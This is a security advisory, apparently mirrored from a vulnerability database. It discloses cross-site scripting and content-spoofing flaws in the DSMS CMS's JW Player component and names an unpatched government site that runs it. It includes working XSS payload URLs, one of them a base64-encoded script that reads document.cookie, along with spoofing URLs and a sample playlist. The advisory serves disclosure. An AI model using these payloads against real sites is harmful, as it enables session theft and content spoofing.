XSS and CS vulnerabilities in DSMS

2014-05-0400:00:00

vulners.com

JSON

Hello 3APA3A!

There are Cross-Site Scripting and Content Spoofing vulnerabilities in DSMS. This is commercial CMS. It's used particularly at government site dsmsu.gov.ua - web site of Ministry of Youth and Sport of Ukraine.

There are also other vulnerabilities in the system, about which I've informed developers. None of the vulnerabilities were fixed.

Affected products:

Vulnerable are all versions of DSMS.

Affected vendors:

Strebul studio
http://strebul.com

Details:

Cross-Site Scripting (WASC-08):

http://site/templates/default/js/jwplayer/player.swf?playerready=alert(document.cookie)
http://site/templates/default/js/jwplayer/player.swf?displayclick=link&link=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B&file=1.jpg

Cross-Site Scripting (WASC-08):

If at the site at page with jwplayer.swf (player.swf) there is possibility (via HTML Injection) to include JS code with callback-function, and there are 19 such functions in total, then it's possible to conduct XSS attack. I.e. JS-callbacks can be used for XSS attack.

Example of exploit:

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameters file and image, which allows to spoof content of flash - i.e. by setting addresses of video (audio) and/or image files from other site.

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF

http://site/templates/default/js/jwplayer/player.swf?file=1.flv&image=1.jpg

Swf-file of JW Player accepts arbitrary addresses in parameter config, which allows to spoof content of flash - i.e. by setting address of config file from other site (parameters file and image in xml-file accept arbitrary addresses). For loading of config file from other site it needs to have crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?config=1.xml

1.xml

Swf-file of JW Player accepts arbitrary addresses in parameter playlistfile, which allows to spoof content of flash - i.e. by setting address of playlist file from other site (parameters media:content and media:thumbnail in xml-file accept arbitrary addresses). For loading of playlist file from other site it needs to have crossdomain.xml.

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss

http://site/templates/default/js/jwplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200

1.rss

<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
<channel>
<title>Example playlist</title>
<item>
<title>Video #1</title>
<description>First video.</description>
<media:content url="1.flv" duration="5" />
<media:thumbnail url="1.jpg" />
</item>
<item>
<title>Video #2</title>
<description>Second video.</description>
<media:content url="2.flv" duration="5" />
<media:thumbnail url="2.jpg" />
</item>
</channel>
</rss>

Timeline:

2013.11.04 - informed administrators of government site. No response, no fix.
2013.11.13 - announced at my site.
2013.11.18 - informed developers about vulnerabilities in CMS and at dsmsu.gov.ua. They promised to fix holes in CMS and at web site, but didn't do it.
2014.02.15 - disclosed at my site (http://websecurity.com.ua/6860/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

JSON